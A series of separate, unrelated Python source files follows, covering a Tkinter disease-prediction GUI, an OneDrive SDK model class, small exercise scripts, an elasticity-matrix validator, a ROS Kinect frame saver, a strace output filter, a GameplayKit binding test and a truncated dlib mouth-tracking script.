    selected for an earlier prediction stayed set for every later one.
    """
    chosen = {s.get() for s in (Symptom1, Symptom2, Symptom3, Symptom4, Symptom5)}
    for k, name in enumerate(SYMPTOMPS):
        l2[k] = 1 if name in chosen else 0
    return [l2]


def _show_prediction(model, textbox):
    """Predict from the selected symptoms; write the disease name into *textbox*."""
    predicted = model.predict(_symptom_vector())[0]
    textbox.delete("1.0", END)
    if 0 <= predicted < len(disease):
        textbox.insert(END, disease[predicted])
    else:
        textbox.insert(END, "Not Found")


def DecisionTree():
    """Prediction 1: decision tree; prints test accuracy to the console."""
    from sklearn import tree
    from sklearn.metrics import accuracy_score
    clf3 = tree.DecisionTreeClassifier()
    clf3 = clf3.fit(X, y)
    y_pred = clf3.predict(X_test)
    print(accuracy_score(y_test, y_pred))
    print(accuracy_score(y_test, y_pred, normalize=False))
    _show_prediction(clf3, t1)


def randomforest():
    """Prediction 2: random forest; prints test accuracy to the console."""
    from sklearn.ensemble import RandomForestClassifier
    from sklearn.metrics import accuracy_score
    clf4 = RandomForestClassifier()
    clf4 = clf4.fit(X, np.ravel(y))
    y_pred = clf4.predict(X_test)
    print(accuracy_score(y_test, y_pred))
    print(accuracy_score(y_test, y_pred, normalize=False))
    _show_prediction(clf4, t2)


def NaiveBayes():
    """Prediction 3: Gaussian naive Bayes; prints test accuracy."""
    from sklearn.naive_bayes import GaussianNB
    from sklearn.metrics import accuracy_score
    gnb = GaussianNB()
    gnb = gnb.fit(X, np.ravel(y))
    y_pred = gnb.predict(X_test)
    print(accuracy_score(y_test, y_pred))
    print(accuracy_score(y_test, y_pred, normalize=False))
    _show_prediction(gnb, t3)


# ---- main GUI -------------------------------------------------------------
root = Tk()


def openfn():
    """Ask the user for an image file and return its path."""
    filename = filedialog.askopenfilename(title='open')
    return filename


def open_img():
    """Let the user pick an image and display it (250x250) in the root grid."""
    x = openfn()
    img = Image.open(x)
    img = img.resize((250, 250), Image.ANTIALIAS)
    img = ImageTk.PhotoImage(img)
    panel = Label(root, image=img)
    panel.image = img  # keep a reference so Tk doesn't garbage-collect it
    panel.grid(row=3)


def openNewWindow():
    """Open the secondary 'Image Disease Prediction' window."""
    newWindow = Toplevel(root)
    root.resizable(width=True, height=True)
    newWindow.title("Image Disease Prediction")
    newWindow.geometry("500x300")
    Label(newWindow, text="Please Upload Patient Image").pack()
    # BUGFIX: the original chained .pack() onto Button(...) (which returns
    # None), then called .grid() on the result and even started a nested
    # root.mainloop() here.
    btn = Button(newWindow, text='open image', command=open_img)
    btn.pack()


Symptom1 = StringVar()
Symptom1.set(None)
Symptom2 = StringVar()
Symptom2.set(None)
Symptom3 = StringVar()
Symptom3.set(None)
Symptom4 = StringVar()
Symptom4.set(None)
Symptom5 = StringVar()
Symptom5.set(None)
Name_Surname = StringVar()
Height = IntVar()
Weight = IntVar()
Gender = StringVar()
Gender.set(None)
Age = IntVar()
Age.set(None)

# Patient-details widgets.  BUGFIX: the entry Text widgets were all bound
# to `t1`, shadowing the Prediction1 output box; they now get distinct names.
w2 = Label(root, justify=LEFT, text="PATIENT", fg="red")
w2.config(font=("Elephant", 12))
w2.grid(row=1, column=0, columnspan=1, padx=100)

w2 = Label(root, justify=LEFT, text="Name Surname:", fg="black")
w2.config(font=("Elephant", 12))
w2.grid(row=2, column=0, columnspan=2, padx=100)
name_entry = Text(root, height=1, width=20, fg="black")
name_entry.grid(row=2, column=1, padx=10)

w2 = Label(root, justify=LEFT, text="Height:", fg="black")
w2.config(font=("Elephant", 12))
w2.grid(row=3, column=0, columnspan=2, padx=100)
height_entry = Text(root, height=1, width=20, fg="black")
height_entry.grid(row=3, column=1, padx=10)

w2 = Label(root, justify=LEFT, text="Weight:", fg="black")
w2.config(font=("Elephant", 12))
w2.grid(row=4, column=0, columnspan=2, padx=100)
weight_entry = Text(root, height=1, width=20, fg="black")
weight_entry.grid(row=4, column=1, padx=10)

S1Lb = Label(root, text=" Big/Small Tension:", fg="black")
S1Lb.grid(row=11, column=1, padx=10, sticky=W)
tension_entry = Text(root, height=1, width=10, fg="black")
tension_entry.grid(row=11, column=1, padx=10)

S2Lb = Label(root, text=" Pulsation:", fg="black")
S2Lb.grid(row=12, column=1, pady=10, sticky=W)
pulse_entry = Text(root, height=1, width=10, fg="black")
pulse_entry.grid(row=12, column=1, padx=10)

S2Lb = Label(root, text=" Temperature:", fg="black")
S2Lb.grid(row=13, column=1, pady=10, sticky=W)
temp_entry = Text(root, height=1, width=10, fg="black")
temp_entry.grid(row=13, column=1, padx=10)

S2Lb = Label(root, text=" Respiration Rate", fg="black")
S2Lb.grid(row=14, column=1, pady=10, sticky=W)
resp_entry = Text(root, height=1, width=10, fg="black")
resp_entry.grid(row=14, column=1, padx=10)

S2Lb = Label(root, text=" Cholestrol:", fg="black")
S2Lb.grid(row=15, column=1, pady=10, sticky=W)
chol_entry = Text(root, height=1, width=10, fg="black")
chol_entry.grid(row=15, column=1, padx=10)

# Dropdown option lists (sorted alphabetically for the menus).
OPTIONS3 = sorted(AGE)
OPTIONS2 = sorted(GENDER)
OPTIONS = sorted(SYMPTOMPS)

GLb = Label(root, text="Gender:", fg="black")
GLb.config(font=("Elephant", 12))
GLb.grid(row=5, column=1, pady=10, sticky=W)
GEn = OptionMenu(root, Gender, *OPTIONS2)
GEn.grid(row=5, column=1, columnspan=2)

ALb = Label(root, text="Age:", fg="black")
ALb.config(font=("Elephant", 12))
ALb.grid(row=6, column=1, pady=10, sticky=W)
S0En = OptionMenu(root, Age, *OPTIONS3)
S0En.grid(row=6, column=1, columnspan=2)

S1Lb = Label(root, text="Symptom 1:", fg="black")
S1Lb.grid(row=6, column=0, pady=10, sticky=W)
S1En = OptionMenu(root, Symptom1, *OPTIONS)
S1En.grid(row=7, column=0)

S2Lb = Label(root, text="Symptom 2:", fg="black")
S2Lb.grid(row=8, column=0, pady=10, sticky=W)
S2En = OptionMenu(root, Symptom2, *OPTIONS)
S2En.grid(row=9, column=0)

S3Lb = Label(root, text="Symptom 3:", fg="black")
S3Lb.grid(row=10, column=0, pady=10, sticky=W)
S3En = OptionMenu(root, Symptom3, *OPTIONS)
S3En.grid(row=11, column=0)

S4Lb = Label(root, text="Symptom 4:", fg="black")
S4Lb.grid(row=12, column=0, pady=10, sticky=W)
S4En = OptionMenu(root, Symptom4, *OPTIONS)
S4En.grid(row=13, column=0)

S5Lb = Label(root, text="Symptom 5:", fg="black")
S5Lb.grid(row=14, column=0, pady=10, sticky=W)
S5En = OptionMenu(root, Symptom5, *OPTIONS)
S5En.grid(row=15, column=0)

# Prediction rows: label, trigger button, and the output Text box each
# classifier callback writes into (t1/t2/t3).
lrLb = Label(root, text=" Predction1:", fg="white", bg="red")
lrLb.grid(row=16, column=0, pady=10, sticky=W)
dst = Button(root, text="Prediction1", command=DecisionTree, fg="blue")
dst.grid(row=16, column=3, padx=10)
t1 = Text(root, height=1, width=40, fg="black")
t1.grid(row=16, column=1, padx=10)

destreeLb = Label(root, text=" Prediction2:", fg="white", bg="red")
destreeLb.grid(row=17, column=0, pady=10, sticky=W)
rnf = Button(root, text="Prediction2", command=randomforest, fg="blue")
rnf.grid(row=17, column=3, padx=10)
t2 = Text(root, height=1, width=40, fg="black")
t2.grid(row=17, column=1, padx=10)

ranfLb = Label(root, text=" Prediction3:", fg="white", bg="red")
ranfLb.grid(row=18, column=0, pady=5, sticky=W)
lr = Button(root, text="Prediction3", command=NaiveBayes, fg="blue")
lr.grid(row=18, column=3, padx=10)
t3 = Text(root, height=1, width=40, fg="black")
t3.grid(row=18, column=1, padx=10)

rnf = Button(root, text="GO TO IMAGE DISEASE PREDICTION PAGE", command=openNewWindow, fg="blue")
rnf.grid(row=1, column=3, padx=10)
rnf = Button(root, text="PREDICT FOR IMAGE", fg="blue")  # NOTE(review): no command bound
rnf.grid(row=5, column=3, padx=10)
rnf1 = Button(root, text="SAVE", fg="blue")  # NOTE(review): no command bound
rnf1.grid(row=7, column=3, padx=10)

root.mainloop()
# -*- coding: utf-8 -*- ''' # Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information. # # This file was generated and any changes will be overwritten. ''' from __future__ import unicode_literals from ..model.item_body import ItemBody from ..model.recipient import Recipient from ..model.extension import Extension from ..model.attachment import Attachment from ..model.single_value_legacy_extended_property import SingleValueLegacyExtendedProperty from ..model.multi_value_legacy_extended_property import MultiValueLegacyExtendedProperty from datetime import datetime from ..one_drive_object_base import OneDriveObjectBase class Post(OneDriveObjectBase): def __init__(self, prop_dict={}): self._prop_dict = prop_dict @property def body(self): """ Gets and sets the body Returns: :class:`ItemBody<onedrivesdk.model.item_body.ItemBody>`: The body """ if "body" in self._prop_dict: if isinstance(self._prop_dict["body"], OneDriveObjectBase): return self._prop_dict["body"] else : self._prop_dict["body"] = ItemBody(self._prop_dict["body"]) return self._prop_dict["body"] return None @body.setter def body(self, val): self._prop_dict["body"] = val @property def received_date_time(self): """ Gets and sets the receivedDateTime Returns: datetime: The receivedDateTime """ if "receivedDateTime" in self._prop_dict: return datetime.strptime(self._prop_dict["receivedDateTime"].replace("Z", ""), "%Y-%m-%dT%H:%M:%S.%f") else: return None @received_date_time.setter def received_date_time(self, val): self._prop_dict["receivedDateTime"] = val.isoformat()+"Z" @property def has_attachments(self): """ Gets and sets the hasAttachments Returns: bool: The hasAttachments """ if "hasAttachments" in self._prop_dict: return self._prop_dict["hasAttachments"] else: return None @has_attachments.setter def has_attachments(self, val): self._prop_dict["hasAttachments"] = val @property def from(self): """ Gets and sets the 
from Returns: :class:`Recipient<onedrivesdk.model.recipient.Recipient>`: The from """ if "from" in self._prop_dict: if isinstance(self._prop_dict["from"], OneDriveObjectBase): return self._prop_dict["from"] else : self._prop_dict["from"] = Recipient(self._prop_dict["from"]) return self._prop_dict["from"] return None @from.setter def from(self, val): self._prop_dict["from"] = val @property def sender(self): """ Gets and sets the sender Returns: :class:`Recipient<onedrivesdk.model.recipient.Recipient>`: The sender """ if "sender" in self._prop_dict: if isinstance(self._prop_dict["sender"], OneDriveObjectBase): return self._prop_dict["sender"] else : self._prop_dict["sender"] = Recipient(self._prop_dict["sender"]) return self._prop_dict["sender"] return None @sender.setter def sender(self, val): self._prop_dict["sender"] = val @property def conversation_thread_id(self): """ Gets and sets the conversationThreadId Returns: str: The conversationThreadId """ if "conversationThreadId" in self._prop_dict: return self._prop_dict["conversationThreadId"] else: return None @conversation_thread_id.setter def conversation_thread_id(self, val): self._prop_dict["conversationThreadId"] = val @property def new_participants(self): """Gets and sets the newParticipants Returns: :class:`NewParticipantsCollectionPage<onedrivesdk.request.new_participants_collection.NewParticipantsCollectionPage>`: The newParticipants """ if "newParticipants" in self._prop_dict: return NewParticipantsCollectionPage(self._prop_dict["newParticipants"]) else: return None @property def conversation_id(self): """ Gets and sets the conversationId Returns: str: The conversationId """ if "conversationId" in self._prop_dict: return self._prop_dict["conversationId"] else: return None @conversation_id.setter def conversation_id(self, val): self._prop_dict["conversationId"] = val @property def extensions(self): """Gets and sets the extensions Returns: 
:class:`ExtensionsCollectionPage<onedrivesdk.request.extensions_collection.ExtensionsCollectionPage>`: The extensions """ if "extensions" in self._prop_dict: return ExtensionsCollectionPage(self._prop_dict["extensions"]) else: return None @property def in_reply_to(self): """ Gets and sets the inReplyTo Returns: :class:`Post<onedrivesdk.model.post.Post>`: The inReplyTo """ if "inReplyTo" in self._prop_dict: if isinstance(self._prop_dict["inReplyTo"], OneDriveObjectBase): return self._prop_dict["inReplyTo"] else : self._prop_dict["inReplyTo"] = Post(self._prop_dict["inReplyTo"]) return self._prop_dict["inReplyTo"] return None @in_reply_to.setter def in_reply_to(self, val): self._prop_dict["inReplyTo"] = val @property def attachments(self): """Gets and sets the attachments Returns: :class:`AttachmentsCollectionPage<onedrivesdk.request.attachments_collection.AttachmentsCollectionPage>`: The attachments """ if "attachments" in self._prop_dict: return AttachmentsCollectionPage(self._prop_dict["attachments"]) else: return None @property def single_value_extended_properties(self): """Gets and sets the singleValueExtendedProperties Returns: :class:`SingleValueExtendedPropertiesCollectionPage<onedrivesdk.request.single_value_extended_properties_collection.SingleValueExtendedPropertiesCollectionPage>`: The singleValueExtendedProperties """ if "singleValueExtendedProperties" in self._prop_dict: return SingleValueExtendedPropertiesCollectionPage(self._prop_dict["singleValueExtendedProperties"]) else: return None @property def multi_value_extended_properties(self): """Gets and sets the multiValueExtendedProperties Returns: :class:`MultiValueExtendedPropertiesCollectionPage<onedrivesdk.request.multi_value_extended_properties_collection.MultiValueExtendedPropertiesCollectionPage>`: The multiValueExtendedProperties """ if "multiValueExtendedProperties" in self._prop_dict: return MultiValueExtendedPropertiesCollectionPage(self._prop_dict["multiValueExtendedProperties"]) else: return 
None
"""Remove outliers.

Reads a natural number n followed by n distinct natural numbers (one per
line), drops the single largest and single smallest value, and prints the
remaining numbers one per line in their original order.

Sample Input:          Sample Output:
10                     9
9                      17
17                     189
189                    55
3                      78
55                     11
78                     7
11                     160
7
888
160
"""
count = int(input())
values = [int(input()) for _ in range(count)]

# list.remove deletes the first occurrence, i.e. exactly the element at
# values.index(max(values)) / values.index(min(values)).
values.remove(max(values))
values.remove(min(values))

for value in values:
    print(value)
# Abrindo arquivo em modo de Leitura arquivo = open('notas_alunos.txt', 'r') lista_notas = [] # Lendo a primeira linha do arquivo conteudo = arquivo.readline() # Adicionando a primeira linha do arquivo na lista_notas # Removendo '\n' com [:-1] e separando as informações # com split (caractere de separação ';') linha = conteudo[:-1].split(';') lista_notas.append(linha) while conteudo: # Lendo uma linha do arquivo a cada iteração do WHILE conteudo = arquivo.readline() # Adicionando a linha do arquivo na lista_notas # Removendo '\n' com [:-1] e separando as informações # com split (caractere de separação ';' linha = conteudo[:-1].split(';') lista_notas.append(linha) # Fechando o Arquivo arquivo.close() # Removendo a última posição da lista lista_notas.pop() # Calculando as Médias for contador in range(0, len(lista_notas)): matricula = lista_notas[contador][0] nota_1 = float(lista_notas[contador][1]) nota_2 = float(lista_notas[contador][2]) nota_3 = float(lista_notas[contador][3]) nota_4 = float(lista_notas[contador][4]) media = (nota_1 + nota_2 + nota_3 + nota_4)/4 print('{0};{1:.2f};{2:.2f};{2:.2f};{3:.2f};{4:.2f}'.format(matricula,nota_1,nota_2,nota_3,nota_4,media))
#!/usr/bin/env python
"""
.. module:: elasticity
   :platform: Unix, Windows, Mac, Linux
   :synopsis: This module can be used to check the validity of input elasticity for 11 Laue classes.

.. moduleauthor:: Qi Zhang <singularitti@outlook.com>
"""

import abc
import warnings

import numpy as np

__all__ = [
    'StiffnessMatrix',
    'CubicSystemStiffnessMatrix',
    'HexagonalSystemStiffnessMatrix',
    'TetragonalSystemStiffnessMatrix',
    'RhombohedralSystemStiffnessMatrix',
    'OrthorhombicSystemStiffnessMatrix',
    'MonoclinicSystemStiffnessMatrix',
    'TriclinicSystemStiffnessMatrix'
]


class StiffnessMatrix:
    """Base wrapper around a 6x6 Voigt-notation stiffness matrix.

    Subclasses declare the symmetry conditions of one crystal system and
    ``validate`` checks them against the stored matrix.

    NOTE(review): abstract methods are declared but the class does not
    inherit ``abc.ABC``, so it remains directly instantiable; kept as-is
    to avoid changing existing behavior.
    """

    def __init__(self, stiffness_matrix):
        stiffness_matrix = np.array(stiffness_matrix, dtype=np.float64)
        if stiffness_matrix.shape != (6, 6):
            raise ValueError("Your *elastic_matrix* must have a shape of (6, 6)!")
        self._stiffness_matrix = stiffness_matrix
        self._eps = 1e-8  # absolute tolerance used by every symmetry check

    @property
    def eps(self):
        """Absolute tolerance for the ``np.isclose`` comparisons."""
        return self._eps

    @eps.setter
    def eps(self, value):
        if not isinstance(value, (int, float)):
            raise TypeError("The `eps` attribute has to be a number!")
        if abs(value) > 1:
            warnings.warn("The value of `eps` attribute may be too large!", stacklevel=2)
        self._eps = value

    @property
    @abc.abstractmethod
    def symmetry_conditions_text(self):
        """LaTeX descriptions pairing one-to-one with ``symmetry_conditions``."""
        ...

    @property
    @abc.abstractmethod
    def symmetry_conditions(self):
        """Booleans, one per symmetry condition of the crystal system."""
        ...

    def validate(self, outfile=None):
        """Return True when all symmetry conditions hold.

        Each failed condition is reported to *outfile* (stdout by default).
        """
        flag = True
        for criterion, criterion_text in zip(self.symmetry_conditions,
                                             self.symmetry_conditions_text):
            if not criterion:  # `criterion` evaluated to `False`
                print("Criterion ${0}$ is not satisfied!".format(criterion_text), file=outfile)
                flag = False
        return flag

    @property
    def stiffness_matrix(self):
        """The stored 6x6 stiffness matrix as a float64 ndarray."""
        return self._stiffness_matrix

    @property
    def compliance_matrix(self):
        """Inverse of the stiffness matrix (LinAlgError when singular)."""
        return np.linalg.inv(self._stiffness_matrix)


class CubicSystemStiffnessMatrix(StiffnessMatrix):
    """Symmetry checks for the cubic system (3 independent constants)."""

    @property
    def symmetry_conditions_text(self):
        return [
            "C_{11} = C_{22} = C_{33}",
            "C_{44} = C_{55} = C_{66}",
            "C_{12} = C_{13} = C_{23} = C_{21} = C_{31} = C_{32}",
        ]

    @property
    def symmetry_conditions(self):
        c = self._stiffness_matrix
        eps = self.eps
        d = np.diag(c)
        # BUGFIX: the off-diagonal elements must be wrapped in a list —
        # ``np.array(c[0, 1], c[0, 2], ...)`` passed the second element as
        # the *dtype* argument and raised a TypeError.
        off_diag = np.array([c[0, 1], c[0, 2], c[1, 2], c[1, 0], c[2, 0], c[2, 1]])
        return [
            np.isclose(d[0:3].min(), d[0:3].max(), atol=eps),
            np.isclose(d[3:6].min(), d[3:6].max(), atol=eps),
            np.isclose(off_diag.min(), off_diag.max(), atol=eps)
        ]


class HexagonalSystemStiffnessMatrix(StiffnessMatrix):
    """Symmetry checks for the hexagonal system."""

    @property
    def symmetry_conditions_text(self):
        return [
            "C_{11} = C_{22}",
            "C_{44} = C_{55}",
            "C_{13} = C_{23}",
            "C_{66} = 1 / 2 (C_{11} - C_{12})"
        ]

    @property
    def symmetry_conditions(self):
        c = self._stiffness_matrix
        eps = self.eps
        return [
            np.isclose(c[0, 0], c[1, 1], atol=eps),
            np.isclose(c[3, 3], c[4, 4], atol=eps),
            np.isclose(c[0, 2], c[1, 2], atol=eps),
            np.isclose(c[5, 5], 0.5 * (c[0, 0] - c[0, 1]), atol=eps)
        ]


class TetragonalSystemStiffnessMatrix(StiffnessMatrix):
    """Symmetry checks for tetragonal (I)/(II); class (I) is assumed when
    C_{16} is exactly zero."""

    @property
    def symmetry_conditions_text(self):
        if self._stiffness_matrix[0, 5] == 0:  # Tetragonal (I) class
            return [
                "C_{11} = C_{22}",
                "C_{44} = C_{55}",
                "C_{13} = C_{23}",
            ]
        return [  # Tetragonal (II) class
            "C_{11} = C_{22}",
            "C_{44} = C_{55}",
            "C_{13} = C_{23}",
            "C_{16} = -C_{26}"
        ]

    @property
    def symmetry_conditions(self):
        c = self._stiffness_matrix
        eps = self.eps
        if self._stiffness_matrix[0, 5] == 0:  # Tetragonal (I) class
            return [
                np.isclose(c[0, 0], c[1, 1], atol=eps),
                np.isclose(c[3, 3], c[4, 4], atol=eps),
                np.isclose(c[0, 2], c[1, 2], atol=eps),
            ]
        return [
            np.isclose(c[0, 0], c[1, 1], atol=eps),
            np.isclose(c[3, 3], c[4, 4], atol=eps),
            np.isclose(c[0, 2], c[1, 2], atol=eps),
            np.isclose(c[0, 5], -c[1, 5], atol=eps)
        ]


class RhombohedralSystemStiffnessMatrix(StiffnessMatrix):
    """Symmetry checks for rhombohedral (I)/(II); class (I) is assumed when
    C_{15} is exactly zero."""

    @property
    def symmetry_conditions_text(self):
        if self._stiffness_matrix[0, 4] == 0:  # Rhombohedral (I) class
            return [
                "C_{11} == C_{22}",
                "C_{44} = C_{55}",
                "C_{13} = C_{23}",
                "C_{66} = 1 / 2 (C_{11} - C_{12})",
                "C_{14} = -C_{24} = -C_{56}"
            ]
        return [  # Rhombohedral (II) class
            "C_{11} == C_{22}",
            "C_{44} = C_{55}",
            "C_{13} = C_{23}",
            "C_{66} = 1 / 2 (C_{11} - C_{12})",
            "C_{14} = -C_{24} = -C_{56}",
            "-C_{15} = C_{25} = C_{46}"
        ]

    @property
    def symmetry_conditions(self):
        c = self._stiffness_matrix
        eps = self.eps
        if self._stiffness_matrix[0, 4] == 0:  # Rhombohedral (I) class
            return [
                np.isclose(c[0, 0], c[1, 1], atol=eps),
                np.isclose(c[3, 3], c[4, 4], atol=eps),
                np.isclose(c[0, 2], c[1, 2], atol=eps),
                np.isclose(c[5, 5], 0.5 * (c[0, 0] - c[0, 1]), atol=eps),
                np.isclose(c[0, 3], -c[1, 3], atol=eps) and np.isclose(c[0, 3], -c[4, 5], atol=eps)
            ]
        return [  # Rhombohedral (II) class
            np.isclose(c[0, 0], c[1, 1], atol=eps),
            np.isclose(c[3, 3], c[4, 4], atol=eps),
            np.isclose(c[0, 2], c[1, 2], atol=eps),
            np.isclose(c[5, 5], 0.5 * (c[0, 0] - c[0, 1]), atol=eps),
            np.isclose(c[0, 3], -c[1, 3], atol=eps) and np.isclose(c[0, 3], -c[4, 5], atol=eps),
            np.isclose(c[1, 4], -c[0, 4], atol=eps) and np.isclose(c[3, 5], -c[0, 4], atol=eps)
        ]


class OrthorhombicSystemStiffnessMatrix(StiffnessMatrix):
    """Symmetry checks for the orthorhombic system (9 independent constants)."""

    @property
    def symmetry_conditions_text(self):
        # BUGFIX: a missing comma used to fuse the last two strings, leaving
        # 3 texts for 4 conditions so `validate` could never report the
        # final check.
        return [
            "C_{14} = C_{24} = C_{34} = 0",
            "C_{15} = C_{25} = C_{35} = C_{45} = 0",
            "C_{16} = C_{26} = C_{36} = C_{46} = C_{56} = 0",
            "There are 9 independent values.",
        ]

    @property
    def symmetry_conditions(self):
        c = self._stiffness_matrix
        eps = self.eps
        return [
            np.allclose(c[0:3, 3], np.full(3, 0), atol=eps),
            np.allclose(c[0:4, 4], np.full(4, 0), atol=eps),
            np.allclose(c[0:5, 5], np.full(5, 0), atol=eps),
            # NOTE(review): counts distinct float values in the whole matrix
            # (zeros included) — a heuristic, not a strict independence count.
            len(np.unique(c)) == 9
        ]


class MonoclinicSystemStiffnessMatrix(StiffnessMatrix):
    """Symmetry checks for the monoclinic system (13 independent constants)."""

    @property
    def symmetry_conditions_text(self):
        return [
            "C_{14} = C_{24} = C_{34} = 0",
            "C_{45} = 0",
            "C_{16} = C_{26} = C_{36} = C_{56} = 0",
            "There are 13 independent values."
        ]

    @property
    def symmetry_conditions(self):
        c = self._stiffness_matrix
        eps = self.eps
        return [
            np.allclose(c[0:3, 3], np.full(3, 0), atol=eps),
            abs(c[3, 4]) < eps,
            np.allclose(c[0:3, 5], np.full(3, 0), atol=eps) and abs(c[4, 5]) < eps,
            # NOTE(review): heuristic distinct-value count, see Orthorhombic.
            len(np.unique(c)) == 13
        ]


class TriclinicSystemStiffnessMatrix(StiffnessMatrix):
    """Triclinic system: no symmetry constraints beyond 21 independent values."""

    @property
    def symmetry_conditions_text(self):
        return [
            "There are 21 independent values."
        ]

    @property
    def symmetry_conditions(self):
        c = self._stiffness_matrix
        return [
            # NOTE(review): heuristic distinct-value count, see Orthorhombic.
            len(np.unique(c)) == 21
        ]
#!/usr/bin/env python
"""Save time-synchronized Kinect2 RGB and depth frames as numbered PNG files."""
import roslib
import sys
import rospy
import cv2
from std_msgs.msg import String
from sensor_msgs.msg import Image, CameraInfo
from cv_bridge import CvBridge, CvBridgeError
import message_filters
import os


class image_converter:
    """Subscribes to the qhd color/depth topics and writes paired PNGs."""

    def __init__(self, FILE_DIR):
        self.FILE_DIR = FILE_DIR  # output directory for the PNG files
        self.rgb_sub = message_filters.Subscriber("/kinect2/qhd/image_color_rect", Image)
        self.d_sub = message_filters.Subscriber("/kinect2/qhd/image_depth_rect", Image)
        # Exact-time synchronizer: the callback fires only for frame pairs
        # whose headers carry identical timestamps (queue size 10).
        self.time_sync = message_filters.TimeSynchronizer([self.rgb_sub, self.d_sub], 10)
        self.time_sync.registerCallback(self.rgbd_callback)
        # Single shared index for RGB_<n>.png / Depth_<n>.png (the original
        # kept two counters incremented in lockstep plus an unused `count`).
        self.frame_counter = 0
        self.bridge = CvBridge()

    def rgbd_callback(self, data_rgb, data_d):
        """Convert one synchronized RGB/depth pair to OpenCV images and save them."""
        try:
            rgb_img = self.bridge.imgmsg_to_cv2(data_rgb, "bgr8")
        except CvBridgeError as e:
            print(e)
            return  # BUGFIX: original fell through and hit a NameError
        try:
            # "passthrough" keeps the 16-bit depth encoding intact.
            d_img = self.bridge.imgmsg_to_cv2(data_d, "passthrough")
        except CvBridgeError as e:
            print(e)
            return
        cv2.imwrite(os.path.join(self.FILE_DIR, "RGB_{0}.png".format(self.frame_counter)), rgb_img)
        cv2.imwrite(os.path.join(self.FILE_DIR, "Depth_{0}.png".format(self.frame_counter)), d_img)
        self.frame_counter += 1
        print("FRAME:", self.frame_counter)


def main(argv):
    """Entry point; usage: ``this_script.py <output_dir>``."""
    FILE_DIR = str(argv[1])  # use the argv parameter, not sys.argv again
    # BUGFIX: init_node must run before any Subscriber is created, so the
    # node is initialized first and the converter constructed afterwards.
    rospy.init_node('Img_Conv', anonymous=True)
    ic = image_converter(FILE_DIR)
    try:
        rospy.spin()
    except KeyboardInterrupt:
        print("Shutting Down.")
    cv2.destroyAllWindows()


if __name__ == '__main__':
    main(sys.argv)
from datastreams.postprocess import filtering, entities from discovery.oca_definitions import * from discovery.kernel_constants import * from discovery.syscall_numbers import * from ctypes import * class straceFilter(filtering.Filter): def initialize(self): self.systemCall_ptr = self.get_ns_pointer("SYSCALL/SYSTEM_CALL") self.sys_tr_filter_ptr = self.get_ns_pointer("SYSCALL/SYS_TR_FILTER") self.sys_char_ptr = self.get_ns_pointer("SYSCALL/SYS_CHAR") self.sys_stat64_ptr = self.get_ns_pointer("SYSCALL/SYS_STAT") self.syscallNames = getNumbersToSysCallNames() self.charValues = {} self.stat64Values = {} self.results = [] def process(self, entity): if entity.get_cid() == self.systemCall_ptr.get_cid(): data = entity.get_extra_data() # print "Name : ", data["name"] # print "Arguments : ", data["raw_params"] metadata = getSyscallMetadata(data["nr"]) if metadata is None: return dict = {} dict["sys_name"] = metadata["sys_name"] argValue = [] for i in range(metadata["numberArgs"]): if metadata['argTypes'][i] is "char": argValue.append(self.charValues[data["nr"]][0]) del self.charValues[data["nr"]][0] # elif metadata['argTypes'][i] is "struct stat64": # argValue.append(self.stat64Values[data["nr"]][0]) # del self.stat64Values[data["nr"]][0] else: argValue.append(data["raw_params"][i]) if data["nr"] in self.charValues.keys(): del self.charValues[data["nr"]] # if data["nr"] in self.stat64Values.keys(): # del self.stat64Values[data["nr"]] dict["arg_values"] = argValue self.results.append(dict) elif entity.get_cid() == self.sys_char_ptr.get_cid(): data = entity.get_extra_data() tag = entity.get_tag() if not tag in self.charValues.keys(): list = [] list.append(data) self.charValues[tag] = list else: list = self.charValues[tag] list.append(data) self.charValues[tag] = list # elif entity.get_cid() == self.sys_stat64_ptr.get_cid(): # data = entity.get_extra_data() # tag = entity.get_tag() # if not tag in self.stat64Values.keys(): # list = [] # list.append(data) # self.stat64Values[tag] 
= list # else: # list = self.stat64Values[tag] # list.append(data) # self.stat64Values[tag] = list elif entity.get_cid() == self.sys_tr_filter_ptr.get_cid(): data = entity.get_extra_data() # print "Event from the Filter :", self.syscallNames[data] def finalize(self): for syscallInfo in self.results: counter = 0 print syscallInfo["sys_name"],"(", for value in syscallInfo["arg_values"]: counter = counter + 1 if counter == len(syscallInfo["arg_values"]): print value, else: print value,",", print ")" # print counter, len(syscallInfo["arg_values"]) print "System call postprocessing complete."
from PyObjCTools.TestSupport import TestCase
import objc
import GameplayKit


class TestGKAgent(TestCase):
    """Bindings sanity checks for GameplayKit's GKAgent classes."""

    def testProtocols(self):
        # Raises if the Objective-C protocol is not exposed to Python.
        objc.protocolNamed("GKAgentDelegate")

    def testMethods(self):
        # rightHanded returns a BOOL; setRightHanded_ takes a BOOL as arg 0.
        self.assertResultIsBOOL(GameplayKit.GKAgent3D.rightHanded)
        self.assertArgIsBOOL(GameplayKit.GKAgent3D.setRightHanded_, 0)
#!/usr/bin/env python # USAGE # python ***.py --shape-predictor shape_predictor_68_face_landmarks.dat # import the necessary packages from scipy.spatial import distance as dist from imutils.video import FileVideoStream from imutils.video import VideoStream from imutils import face_utils import numpy as np import argparse import imutils import time import dlib import cv2 def mouth_openness(mouth, outer_lips=True): # use idx=3,9 for outer lips, idx=14,18 for inner lips # use idx=0,6 for outer lip edges, idx=12,16 for inner lip edges if outer_lips: a = dist.euclidean(mouth[3], mouth[9]) b = dist.euclidean(mouth[0], mouth[6]) r = a/b else: a = dist.euclidean(mouth[14], mouth[18]) b = dist.euclidean(mouth[12], mouth[16]) r = a/b return r # construct the argument parse and parse the arguments ap = argparse.ArgumentParser() ap.add_argument("-p", "--shape-predictor", required=True, help="path to facial landmark predictor") ap.add_argument("-v", "--video", type=str, default="", help="path to input video file") args = vars(ap.parse_args()) # initialize dlib's face detector (HOG-based) and then create # the facial landmark predictor print("[INFO] loading facial landmark predictor...") detector = dlib.get_frontal_face_detector() predictor = dlib.shape_predictor(args["shape_predictor"]) # grab the indexes of the facial landmarks for the mouth (mStart, mEnd) = face_utils.FACIAL_LANDMARKS_IDXS["mouth"] # [48,68] whole mouth [61,68] mouth hole (mhStart, mhEnd) = (61,68) # start the video stream thread print("[INFO] starting video stream thread...") #vs = FileVideoStream(args["video"]).start() #fileStream = True vs = VideoStream(src=0).start() # vs = VideoStream(usePiCamera=True).start() fileStream = False time.sleep(1.0) # loop over frames from the video stream while True: # if this is a file video stream, then we need to check if # there any more frames left in the buffer to process if fileStream and not vs.more(): break # grab the frame from the threaded video file stream, 
